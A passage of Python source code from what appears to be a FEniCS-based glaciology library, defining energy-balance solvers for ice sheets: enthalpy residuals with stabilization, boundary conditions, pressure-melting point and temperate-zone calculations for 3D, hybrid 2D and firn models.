ut_norm)\n\t\tpsihat = psi + tau * dot(ut, grad(psi))\n\n\t\t# the linear differential operator for this problem :\n\t\tdef Lu(theta):\n\t\t\treturn + rho * dot(u, grad(theta)) \\\n\t\t\t - kappa/c * div(grad(theta)) \\\n\t\t\t - dot(grad(kappa/c), grad(theta))\n\n\t\t# the advective part of the operator :\n\t\tdef L_adv(theta):\n\t\t\treturn dot(ut, grad(theta))\n\n\t\t# the adjoint of the operator :\n\t\tdef L_star(theta):\n\t\t\treturn - dot(u, grad(theta)) \\\n\t\t\t - Xi * div(grad(theta)) \\\n\t\t\t + 1/rho * dot(grad(kappa/c), grad(theta))\n\n\t\t# use streamline-upwind/Petrov-Galerkin stabilization :\n\t\tif stabilization_method == 'SUPG':\n\t\t\ts = \" - using streamline-upwind/Petrov-Galerkin stabilization -\"\n\t\t\tLL = lambda x: + L_adv(x)\n\t\t# use Galerkin/least-squares stabilization :\n\t\telif stabilization_method == 'GLS':\n\t\t\ts = \" - using Galerkin/least-squares stabilization -\"\n\t\t\tLL = lambda x: + Lu(x)\n\t\t# use subgrid-scale-model stabilization :\n\t\telif stabilization_method == 'SSM':\n\t\t\ts = \" - using subgrid-scale-model stabilization -\"\n\t\t\tLL = lambda x: - L_star(x)\n\t\tprint_text(s, cls=self)\n\n\t\t# form the residual :\n\t\tresid = + rho * dot(u, grad(theta_mid)) * psi * dOmega \\\n\t\t\t + kappa/c * inner(grad(psi), grad(theta_mid)) * dOmega \\\n\t\t\t - dot(grad(kappa/c), grad(theta_mid)) * psi * dOmega \\\n\t\t\t - g_b * psi * dGamma_bg \\\n\t\t\t - Q * psi * dOmega \\\n\t\t\t + inner(LL(psi), tau*(Lu(theta_mid) - Q)) * dOmega \\\n\n\t\t# add the time derivative term if transient :\n\t\tif transient:\n\t\t\tresid += rho * (dtheta - theta_0) / dt * psi * dOmega\n\n\t\t# set this Physics instance's residual, left-, and right-hand sides :\n\t\tself.set_residual(resid)\n\n\t\t# surface boundary condition :\n\t\ttheta_bcs = []\n\t\tif model.N_GAMMA_S_GND > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_S_GND) )\n\t\tif model.N_GAMMA_U_GND > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_U_GND) )\n\t\tif model.N_GAMMA_S_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_S_FLT) )\n\t\tif model.N_GAMMA_U_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_U_FLT) )\n\n\t\t# apply T_melt conditions of portion of ice in contact with water :\n\t\tif model.N_GAMMA_B_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_float,\n\t\t\t model.ff, model.GAMMA_B_FLT) )\n\t\tif model.N_GAMMA_L_UDR > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_float,\n\t\t\t model.ff, model.GAMMA_L_UDR) )\n\n\t\t# apply lateral ``divide'' boundaries if desired :\n\t\tif use_lat_bc:\n\t\t\ts = \" - using divide-lateral boundary conditions -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tif model.N_GAMMA_L_DVD > 0:\n\t\t\t\ttheta_bcs.append( DirichletBC(self.Q, model.theta_app,\n\t\t\t\t model.ff, model.GAMMA_L_DVD) )\n\n\t\t# update this Physics instance's list of boundary conditions :\n\t\tself.set_boundary_conditions(theta_bcs)\n\n\t\t# initialize the boundary conditions and thermal properties, if\n\t\t# we have not done so already :\n\t\tif not reset:\n\t\t\t# calculate energy and temperature melting point :\n\t\t\tself.calc_T_melt(annotate=False)\n\n\t\t\tT_v = T.vector().get_local()\n\t\t\tW_v = W.vector().get_local()\n\t\t\tT_s_v = T_surface.vector().get_local()\n\t\t\tT_m_v = T_m.vector().get_local()\n\t\t\tTp_v = T_v.copy()\n\t\t\ttheta_s_v = 146.3*T_s_v + 7.253/2.0*T_s_v**2\n\t\t\ttheta_f_v = 146.3*(T_m_v - 1.0) + 7.253/2.0*(T_m_v - 1.0)**2\n\t\t\ttheta_i_v = 146.3*T_v + 7.253/2.0*T_v**2 + W_v * L_f(0)\n\n\t\t\t# Surface boundary condition :\n\t\t\ts = \"::: calculating energy boundary conditions :::\"\n\t\t\tprint_text(s, cls=self)\n\n\t\t\t# initialize the boundary conditions :\n\t\t\tmodel.init_theta_surface(theta_s_v)\n\t\t\tmodel.init_theta_app(theta_s_v)\n\t\t\tmodel.init_theta_float(theta_f_v)\n\n\t\t\t# initialize energy from W and T :\n\t\t\tmodel.init_theta(theta_i_v)\n\n\tdef calc_Pe(self, avg=False, annotate=annotate):\n\t\tr\"\"\"\n\t\tcalculates the grid P\\'{e}clet number to self.model.Pe.\n\n\t\tif avg=True, calculate the vertical average.\n\t\t\"\"\"\n\t\ts = \"::: calculating Peclet number :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tPe = self.get_grid_peclet_number()\n\t\tif avg: Pe = self.model.calc_vert_average(Pe, annotatate=annotate)\n\t\telse: Pe = project(Pe, solver_type='iterative', annotate=annotate)\n\t\tself.model.assign_variable(self.model.Pe, Pe, annotate=annotate)\n\n\tdef calc_vert_avg_W(self):\n\t\t\"\"\"\n\t\tcalculates the vertical averge water content W, saved to model.Wbar.\n\t\t\"\"\"\n\t\ts = \"::: calculating vertical average internal water content :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tWbar = self.model.calc_vert_average(self.model.W)\n\t\tself.model.init_Wbar(Wbar)\n\n\tdef calc_vert_avg_strain_heat(self):\n\t\t\"\"\"\n\t\tcalculates integrated strain-heating, saved to model.Qbar.\n\t\t\"\"\"\n\t\ts = \"::: calculating vertical average strain heat :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# calculate downward vertical integral :\n\t\tQ = self.get_internal_friction_heat()\n\t\tQbar = self.model.calc_vert_average(Q)\n\t\tself.model.init_Qbar(Qbar)\n\n\tdef calc_temperate_thickness(self):\n\t\t\"\"\"\n\t\tcalculates the temperate zone thickness, saved to model.alpha_int.\n\t\t\"\"\"\n\t\ts = \"::: calculating temperate zone thickness :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\talpha_int = model.vert_integrate(model.alpha, d='down')\n\t\talpha_int = model.vert_extrude(alpha_int, d='up')\n\t\tmodel.init_alpha_int(alpha_int)\n\n\tdef calc_temp_rat(self):\n\t\t\"\"\"\n\t\tcalculates the ratio of the temperate zone, saved to model.temp_rat.\n\t\t\"\"\"\n\t\ts = \"::: calculating ratio of column that is temperate :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tself.calc_temperate_thickness()\n\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tS_v = model.S.vector().get_local()\n\t\tB_v = model.B.vector().get_local()\n\t\talpha_int_v = model.alpha_int.vector().get_local()\n\t\tH_v = S_v - B_v + DOLFIN_EPS\n\t\ttemp_rat_v = alpha_int_v / H_v\n\t\ttemp_rat_v[temp_rat_v < 0.0] = 0.0\n\t\ttemp_rat_v[temp_rat_v > 1.0] = 1.0\n\t\tmodel.init_temp_rat(alpha_int_v / H_v)\n\n\tdef calc_T_melt(self, annotate=False):\n\t\t\"\"\"\n\t\tCalculates temperature melting point model.T_melt and energy melting point\n\t\tmodel.theta_melt.\n\n\t\t\"\"\"\n\t\ts = \"::: calculating pressure-melting temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tgamma = model.gamma\n\t\tT_w = model.T_w\n\t\tp = model.p\n\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tp_v = p.vector().get_local()\n\t\tTm = T_w(0) - gamma(0)*p_v\n\t\ttht_m = 146.3*Tm + 7.253/2.0*Tm**2\n\n\t\tmodel.assign_variable(model.T_melt, Tm, annotate=annotate)\n\t\tmodel.assign_variable(model.theta_melt, tht_m, annotate=annotate)\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tnparams = {'newton_solver' : {'linear_solver' : 'gmres',\n\t\t 'preconditioner' : 'hypre_amg',\n\t\t 'relative_tolerance' : 1e-13,\n\t\t 'relaxation_parameter' : 1.0,\n\t\t 'maximum_iterations' : 20,\n\t\t 'error_on_nonconvergence' : False}}\n\t\tparams = {'solver' : {'linear_solver' : 'mumps',\n\t\t 'preconditioner' : 'none'},\n\t\t 'nparams' : nparams,\n\t\t 'use_surface_climate' : False}\n\t\treturn params\n\n\tdef mark_temperate_zone(self):\n\t\t\"\"\"\n\t\tmark basal regions with overlying temperate layer to model.alpha.\n\t\t\"\"\"\n\t\ts = \"::: marking basal regions with an overlying temperate layer :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tW_v = self.model.W.vector().get_local()\n\t\talpha_v = self.model.alpha.vector().get_local()\n\t\talpha_v[:] = 0\n\t\talpha_v[W_v > 0] = 1\n\t\tself.model.init_alpha(alpha_v)\n\n\tdef calc_basal_temperature_flux(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal temperature flux stored in model.gradT_B.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal temperature flux k \\\\nabla T \\\\cdot n :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tn_b = self.model.n_b\n\t\tq = self.get_temperature_flux_vector()\n\t\tq_dot_n = project(dot(q, n_b), self.model.Q, annotate=annotate)\n\t\tself.model.assign_variable(self.model.gradT_B, q_dot_n, annotate=annotate)\n\t\tprint_min_max(self.model.gradT_B, 'gradT_B')\n\n\tdef calc_basal_temperature_melting_flux(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal temperature melting flux stored in model.gradTm_B.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal temperature flux k \\\\nabla T_m \\\\cdot n :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tn_b = self.model.n_b\n\t\tq = self.get_temperature_melting_flux_vector()\n\t\tq_dot_n = project(dot(q, n_b), self.model.Q, annotate=annotate)\n\t\tself.model.assign_variable(self.model.gradTm_B, q_dot_n, annotate=annotate)\n\t\tprint_min_max(self.model.gradTm_B, 'gradTm_B')\n\n\tdef calc_basal_melting_rate(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal melt rate stored in model.Mb.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal-melt-rate :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tM_b = project(self.get_basal_melting_rate(), self.model.Q, \\\n\t\t annotate=annotate)\n\t\tself.model.assign_variable(self.model.Mb, M_b, annotate=annotate)\n\n\tdef calc_q_fric(self):\n\t\tr\"\"\"\n\t\tSolve for the friction heat term stored in ``model.q_fric``.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal friction heat :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tq_fric = project(self.get_external_friction_heat(), self.model.Q, \\\n\t\t annotate=annotate)\n\t\tself.model.assign_variable(self.model.q_fric, q_fric, annotate=annotate)\n\n\tdef derive_temperate_zone(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve the steady-state energy equation, saving enthalpy to model.theta,\n\t\ttemperature to model.T, and water content to model.W such that the\n\t\tregions with overlying temperate ice are properly marked by model.alpha.\n\t\t\"\"\"\n\t\tmodel = self.model\n\n\t\t# solve the energy equation :\n\t\ts = \"::: solving for temperate zone locations :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# ensure that the boundary-marking process is done in steady state :\n\t\ttransient = False\n\t\tif self.transient:\n\t\t\tself.make_steady_state()\n\t\t\ttransient = True\n\n\t\t# put the physics in temperate zone marking mode :\n\t\tif self.energy_flux_mode != 'temperate_zone_mark':\n\t\t\tzef = True\n\t\t\tmode = self.energy_flux_mode\n\t\t\tself.set_basal_flux_mode('temperate_zone_mark')\n\n\t\t# solve the linear system :\n\t\tsolve(self.get_lhs() == self.get_rhs(), self.get_unknown(),\n\t\t self.get_boundary_conditions(),\n\t\t solver_parameters = self.solve_params['solver'], annotate=annotate)\n\n\t\t# calculate water content :\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\ttheta_v = self.get_unknown().vector().get_local()\n\t\ttheta_melt_v = model.theta_melt.vector().get_local()\n\t\tW_v = (theta_v - theta_melt_v) / model.L_f(0)\n\t\tW_v[W_v < 0.0] = 0.0 # no water where frozen, please.\n\n\t\t# mark appropriately basal regions with an overlying temperate layer :\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\talpha_v = model.alpha.vector().get_local()\n\t\talpha_v[:] = 0\n\t\talpha_v[W_v > 0] = 1\n\t\tmodel.init_alpha(alpha_v)\n\n\t\t# reset to previous energy flux mode, if necessary :\n\t\tif zef:\n\t\t\tself.set_basal_flux_mode(mode)\n\n\t\t# convert back to transient if necessary :\n\t\tif transient:\n\t\t\tenergy.make_transient(time_step = model.time_step)\n\n\tdef update_thermal_parameters(self, annotate=False):\n\t\t\"\"\"\n\t\tfixed-point iterations to make all linearized thermal parameters consistent.\n\t\t\"\"\"\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tmodel = self.model\n\n\t\t# solve the energy equation :\n\t\ts = \"::: updating thermal parameters :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# ensure that we have steady state :\n\t\ttransient = False\n\t\tif self.transient:\n\t\t\tself.make_steady_state()\n\t\t\ttransient = True\n\n\t\t# previous theta for norm calculation\n\t\tU_prev = self.get_unknown().copy(True)\n\n\t\t# iteration counter :\n\t\tcounter = 1\n\n\t\t# maximum number of iterations :\n\t\tmax_iter = 1000\n\n\t\t# L_2 erro norm between iterations :\n\t\tabs_error = np.inf\n\t\trel_error = np.inf\n\n\t\t# tolerances for stopping criteria :\n\t\tatol = 1e-7\n\t\trtol = 1e-8\n\n\t\t# perform a fixed-point iteration until the L_2 norm of error\n\t\t# is less than tolerance :\n\t\twhile abs_error > atol and rel_error > rtol and counter <= max_iter:\n\n\t\t\t# solve the linear system :\n\t\t\tsolve(self.get_lhs() == self.get_rhs(), self.get_unknown(),\n\t\t\t self.get_boundary_conditions(),\n\t\t\t solver_parameters = self.solve_params['solver'], annotate=annotate)\n\n\t\t\t# calculate L_2 norms :\n\t\t\tabs_error_n = norm(U_prev.vector() - self.get_unknown().vector(), 'l2')\n\t\t\ttht_nrm = norm(self.get_unknown().vector(), 'l2')\n\n\t\t\t# save convergence history :\n\t\t\tif counter == 1:\n\t\t\t\trel_error = abs_error_n\n\t\t\telse:\n\t\t\t\trel_error = abs(abs_error - abs_error_n)\n\n\t\t\t# print info to screen :\n\t\t\tif model.MPI_rank == 0:\n\t\t\t\ts0 = '>>> '\n\t\t\t\ts1 = 'thermal parameter update iteration %i (max %i) done: ' \\\n\t\t\t\t % (counter, max_iter)\n\t\t\t\ts2 = 'r (abs) = %.2e ' % abs_error\n\t\t\t\ts3 = '(tol %.2e), ' % atol\n\t\t\t\ts4 = 'r (rel) = %.2e ' % rel_error\n\t\t\t\ts5 = '(tol %.2e)' % rtol\n\t\t\t\ts6 = ' <<<'\n\t\t\t\ttext0 = get_text(s0, 'red', 1)\n\t\t\t\ttext1 = get_text(s1, 'red')\n\t\t\t\ttext2 = get_text(s2, 'red', 1)\n\t\t\t\ttext3 = get_text(s3, 'red')\n\t\t\t\ttext4 = get_text(s4, 'red', 1)\n\t\t\t\ttext5 = get_text(s5, 'red')\n\t\t\t\ttext6 = get_text(s6, 'red', 1)\n\t\t\t\tprint(text0 + text1 + text2 + text3 + text4 + text5 + text6)\n\n\t\t\t# update error stuff and increment iteration counter :\n\t\t\tabs_error = abs_error_n\n\t\t\tU_prev = self.get_unknown().copy(True)\n\t\t\tcounter += 1\n\n\t\t\t# update the model variable :\n\t\t\tself.update_model_var(self.get_unknown(), annotate=annotate)\n\n\t\t\t# update the temperature and water content for other physics :\n\t\t\tself.partition_energy(annotate=annotate)\n\n\t\t# convert back to transient if necessary :\n\t\tif transient:\n\t\t\tenergy.make_transient(time_step = model.time_step)\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve the energy equations, saving energy to ``model.theta``, temperature\n\t\tto ``model.T``, and water content to ``model.W``.\n\t\t\"\"\"\n\t\tmodel = self.model\n\n\t\t# update the surface climate if desired :\n\t\tif self.solve_params['use_surface_climate']: self.solve_surface_climate()\n\n\t\t# solve as defined in ``physics.Physics.solve()`` :\n\t\tsuper(Energy, self).solve(annotate)\n\n\t\t# update the temperature and water content for other physics :\n\t\tself.partition_energy(annotate=False)\n\n\tdef update_model_var(self, u, annotate=False):\n\t\t\"\"\"\n\t\tUpdate the energy function ``self.model.theta`` to those given by ``u``.\n\t\t\"\"\"\n\t\tself.ass_theta.assign(self.model.theta, u, annotate=annotate)\n\t\tprint_min_max(self.model.theta, 'theta')\n\n\n\n\n\n\nclass EnergyHybrid(Energy):\n\t\"\"\"\n\tNew 2D hybrid model.\n\n\tOriginal author: Doug Brinkerhoff: https://dbrinkerhoff.org/\n\t\"\"\"\n\t# TODO: `energy_flux_mode` and `stabilization_method` makes no sense here.\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS'):\n\t\t\"\"\"\n\t\tSet up energy equation residual.\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING HYBRID ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tif type(model) != D2Model:\n\t\t\ts = \">>> EnergyHybrid REQUIRES A 'D2Model' INSTANCE, NOT %s <<<\"\n\t\t\tprint_text(s % type(model) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# save the solver parameters :\n\t\tself.solve_params = solve_params\n\n\t\tself.transient = transient\n\n\t\t# CONSTANTS\n\t\tyear = model.spy\n\t\tg = model.g\n\t\tn = model.n\n\n\t\tk = model.k_i\n\t\trho = model.rho_i\n\t\tCp = model.c_i\n\t\tkappa = year*k/(rho*Cp)\n\n\t\tq_geo = model.q_geo\n\t\tS = model.S\n\t\tB = model.B\n\t\tbeta = model.beta\n\t\tT_s = model.T_surface\n\t\tT_w = model.T_w\n\t\tH = model.H\n\t\tH0 = model.H0\n\t\tT_ = model.T_\n\t\tT0_ = model.T0_\n\t\tdeltax = model.deltax\n\t\tsigmas = model.sigmas\n\t\teps_reg = model.eps_reg\n\t\th = model.h\n\t\tdt = model.time_step\n\t\tN_T = model.N_T\n\n\t\tBc = 3.61e-13*year\n\t\tBw = 1.73e3*year # model.a0 ice hardness\n\t\tQc = 6e4\n\t\tQw = model.Q0 # ice act. energy\n\t\tRc = model.R # gas constant\n\t\tgamma = model.gamma # pressure melting point depth dependence\n\n\t\t# get velocity components :\n\t\t# ANSATZ\n\t\tcoef = [lambda s:1.0, lambda s:1./4.*(5*s**4 - 1.0)]\n\t\tdcoef = [lambda s:0.0, lambda s:5*s**3]\n\n\t\tU = momentum.U\n\t\tu_ = [U[0], U[2]]\n\t\tv_ = [U[1], U[3]]\n\n\t\tu = VerticalBasis(u_, coef, dcoef)\n\t\tv = VerticalBasis(v_, coef, dcoef)\n\n\t\t# FUNCTION SPACES\n\t\tQ = model.Q\n\t\tZ = model.Z\n\n\t\t# ENERGY BALANCE\n\t\tPsi = TestFunction(Z)\n\t\tdT = TrialFunction(Z)\n\n\t\tT = VerticalFDBasis(T_, deltax, coef, sigmas)\n\t\tT0 = VerticalFDBasis(T0_, deltax, coef, sigmas)\n\n\t\t# METRICS FOR COORDINATE TRANSFORM\n\t\tdef dsdx(s):\n\t\t\treturn 1./H*(S.dx(0) - s*H.dx(0))\n\n\t\tdef dsdy(s):\n\t\t\treturn 1./H*(S.dx(1) - s*H.dx(1))\n\n\t\tdef dsdz(s):\n\t\t\treturn -1./H\n\n\t\tdef epsilon_dot(s):\n\t\t\treturn ( + (u.dx(s,0) + u.ds(s)*dsdx(s))**2 \\\n\t\t\t + (v.dx(s,1) + v.ds(s)*dsdy(s))**2 \\\n\t\t\t + (u.dx(s,0) + u.ds(s)*dsdx(s))*(v.dx(s,1) + v.ds(s)*dsdy(s)) \\\n\t\t\t + 0.25*((u.ds(s)*dsdz(s))**2 + (v.ds(s)*dsdz(s))**2 \\\n\t\t\t + (+ (u.dx(s,1) + u.ds(s)*dsdy(s)) \\\n\t\t\t + (v.dx(s,0) + v.ds(s)*dsdx(s)))**2) \\\n\t\t\t + eps_reg)\n\n\t\tdef A_v(T):\n\t\t\treturn conditional(le(T,263.15),Bc*exp(-Qc/(Rc*T)),Bw*exp(-Qw/(Rc*T)))\n\n\t\tdef eta_v(s):\n\t\t\treturn A_v(T0.eval(s))**(-1./n)/2.*epsilon_dot(s)**((1.-n)/(2*n))\n\n\t\tdef w(s):\n\t\t\tw_0 = (U[0].dx(0) + U[1].dx(1))*(s-1.)\n\t\t\tw_2 = + (U[2].dx(0) + U[3].dx(1))*(s**(n+2) - s)/(n+1) \\\n\t\t\t + (n+2)/H*U[2]*(1./(n+1)*(s**(n+1) - 1.)*S.dx(0) \\\n\t\t\t - 1./(n+1)*(s**(n+2) - 1.)*H.dx(0)) \\\n\t\t\t + (n+2)/H*U[3]*(+ 1./(n+1)*(s**(n+1) - 1.)*S.dx(1) \\\n\t\t\t - 1./(n+1)*(s**(n+2) - 1.)*H.dx(1))\n\t\t\treturn (u(1)*B.dx(0) + v(1)*B.dx(1)) - 1./dsdz(s)*(w_0 + w_2)\n\n\t\tR_T = 0\n\n\t\tfor i in range(N_T):\n\t\t\t# SIGMA COORDINATE\n\t\t\ts = i/(N_T-1.0)\n\n\t\t\t# EFFECTIVE VERTICAL VELOCITY\n\t\t\tw_eff = u(s)*dsdx(s) + v(s)*dsdy(s) + w(s)*dsdz(s)\n\n\t\t\tif transient:\n\t\t\t\tw_eff += 1.0/H*(1.0 - s)*(H - H0)/dt\n\n\t\t\t# STRAIN HEAT\n\t\t\t#Phi_strain = (2*n)/(n+1)*2*eta_v(s)*epsilon_dot(s)\n\t\t\tPhi_strain = 4*eta_v(s)*epsilon_dot(s)\n\n\t\t\t# STABILIZATION SCHEME\n\t\t\t#Umag = sqrt(u(s)**2 + v(s)**2 + 1e-3)\n\t\t\t#tau = h/(2*Umag)\n\t\t\t#Psihat = Psi[i] + tau*(u(s)*Psi[i].dx(0) + v(s)*Psi[i].dx(1))\n\t\t\tUnorm = sqrt(u(s)**2 + v(s)**2 + DOLFIN_EPS)\n\t\t\tPe = Unorm*h/(2*kappa)\n\t\t\ttau = 1/tanh(Pe) - 1/Pe\n\t\t\tPsihat = Psi[i] + h*tau/(2*Unorm) * (+ u(s)*Psi[i].dx(0) \\\n\t\t\t + v(s)*Psi[i].dx(1) )\n\n\t\t\t# SURFACE BOUNDARY\n\t\t\tif i==0:\n\t\t\t\tR_T += Psi[i]*(T(i) - T_s)*dx\n\t\t\t# BASAL BOUNDARY\n\t\t\telif i==(N_T-1):\n\t\t\t\tR_T += (u(s)*T.dx(i,0) + v(s)*T.dx(i,1))*Psihat*dx\n\t\t\t\tR_T += -Phi_strain/(rho*Cp)*Psi[i]*dx\n\t\t\t\tR_T += -w_eff*q_geo/(rho*Cp*kappa*dsdz(s))*Psi[i]*dx\n\t\t\t\tf = (q_geo + beta*(u(s)**2 + v(s)**2))/(rho*Cp*kappa*dsdz(s))\n\t\t\t\tR_T += -2.*kappa*dsdz(s)**2*(+ (T(N_T-2) - T(N_T-1)) / deltax**2 \\\n\t\t\t\t - f/deltax)*Psi[i]*dx\n\t\t\t# INTERIOR\n\t\t\telse:\n\t\t\t\tR_T += -kappa*dsdz(s)**2.*T.d2s(i)*Psi[i]*dx\n\t\t\t\tR_T += w_eff*T.ds(i)*Psi[i]*dx\n\t\t\t\tR_T += (u(s)*T.dx(i,0) + v(s)*T.dx(i,1))*Psihat*dx\n\t\t\t\tR_T += -Phi_strain/(rho*Cp)*Psi[i]*dx\n\n\t\t\tif transient:\n\t\t\t\tdTdt = (T(i) - T0(i))/dt\n\t\t\t\tR_T += dTdt*Psi[i]*dx\n\n\t\t# PRETEND THIS IS LINEAR (A GOOD APPROXIMATION IN THE TRANSIENT CASE)\n\t\tself.R_T = replace(R_T, {T_:dT})\n\n\t\t# pressure melting point calculation, do not annotate for initial calc :\n\t\tself.Tm = as_vector([T_w - sigma*gamma*rho*g*H for sigma in sigmas])\n\t\tself.calc_T_melt(annotate=False)\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_ffc_options(self):\n\t\t\"\"\"\n\t\tReturns a set of default ffc options that yield good performance\n\t\t\"\"\"\n\t\t#ffc_options = {\"optimize\" : True,\n\t\t# \"eliminate_zeros\" : True,\n\t\t# \"precompute_basis_const\" : True,\n\t\t# \"precompute_ip_const\" : True}\n\t\tffc_options = {\"optimize\" : True}\n\t\treturn ffc_options\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tm_params = {'solver' : {'linear_solver': 'mumps'},\n\t\t 'ffc_params' : self.default_ffc_options()}\n\t\treturn m_params\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\tSolves for hybrid energy.\n\t\t\"\"\"\n\t\ts = \"::: solving 'EnergyHybrid' for temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# SOLVE TEMPERATURE\n\t\tsolve(lhs(self.R_T) == rhs(self.R_T), model.T_,\n\t\t solver_parameters=self.solve_params['solver'],\n\t\t form_compiler_parameters=self.solve_params['ffc_params'],\n\t\t annotate=annotate)\n\t\tprint_min_max(model.T_, 'T_')\n\n\t\tif self.transient:\n\t\t\tmodel.T0_.assign(model.T_)\n\n\t\t# correct for pressure melting point :\n\t\tT_v = model.T_.vector().get_local()\n\t\tT_melt_v = model.Tm.vector().get_local()\n\t\tT_v[T_v > T_melt_v] = T_melt_v[T_v > T_melt_v]\n\t\tmodel.assign_variable(model.T_, T_v)\n\n\t\tout_T = model.T_.split(True) # deepcopy avoids projections\n\n\t\tmodel.assign_variable(model.Ts, out_T[0])\n\t\tmodel.assign_variable(model.Tb, out_T[-1])\n\n\t\t# update the melting temperature too :\n\t\tself.calc_T_melt(annotate=annotate)\n\n\tdef calc_T_melt(self, annotate=False):\n\t\t\"\"\"\n\t\tCalculates pressure-melting point in model.T_melt.\n\t\t\"\"\"\n\t\ts = \"::: calculating pressure-melting temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tT_melt = project(self.Tm, solver_type='iterative', annotate=annotate)\n\n\t\tTb_m = T_melt.split(True)[-1] # deepcopy avoids projections\n\t\tmodel.assign_variable(model.T_melt, Tb_m)\n\t\tmodel.assign_variable(model.Tm, T_melt)\n\n\n\n\n\n\nclass EnergyFirn(Energy):\n\t\"\"\"\n\t\"\"\"\n\t# TODO: energy flux mode makes no sense here.\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t reset = False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING FIRN ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tif type(model) != D1Model:\n\t\t\ts = \">>> FirnEnergy REQUIRES A 'D1Model' INSTANCE, NOT %s <<<\"\n\t\t\tprint_text(s % type(model) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# save the solver parameters :\n\t\tself.solve_params = solve_params\n\n\t\tmesh = model.mesh\n\t\tQ = model.Q\n\n\t\tspy = model.spy\n\t\ttheta = model.theta # enthalpy\n\t\ttheta0 = model.theta0 # previous enthalpy\n\t\tT = model.T # temperature\n\t\trhof = model.rho # density of firn\n\t\tsigma = model.sigma # overburden stress\n\t\tr = model.r # grain size\n\t\tw = model.w # velocity\n\t\tm = model.m # mesh velocity\n\t\tdt = model.time_step # timestep\n\t\trho_i = model.rho_i # density of ice\n\t\trho_w = model.rho_w # density of water\n\t\tc_i = model.c_i # heat capacity of ice\n\t\tc_w = model.c_w # heat capacity of water\n\t\tk_w = model.k_w # thermal conductivity of water\n\t\tT = model.T\n\t\tT_w = model.T_w\n\t\tL_f = model.L_f\n\t\tthetasp = model.thetasp\n\t\tp = model.p\n\t\tetaw = model.etaw\n\t\trho_w = model.rho_w\n\t\t#w = w - m\n\t\tz = model.x[0]\n\t\tg = model.g\n\t\tS = model.S\n\t\th = model.h\n\t\t#W = model.W\n\t\tdx = model.dx\n\n\t\txi = TestFunction(Q)\n\t\tdtheta = TrialFunction(Q)\n\n\t\t# thermal conductivity parameter :\n\t\t#k_i = model.k_i*(rho / rho_i)**2\n\t\tk_i = 9.828 * exp(-0.0057*T)\n\n\t\t# water content :\n\t\tWm = conditional(lt(theta, c_i*T_w), 0.0, (theta - c_i*T_w)/L_f)\n\n\t\t# bulk properties :\n\t\tkb = k_w * Wm + (1-Wm)*k_i\n\t\tcb = c_w * Wm + (1-Wm)*c_i\n\t\trhob = rho_w * Wm + (1-Wm)*rhof\n\n\t\t# initialize energy :\n\t\tT_v = T.vector().get_local()\n\t\tmodel.assign_variable(theta, 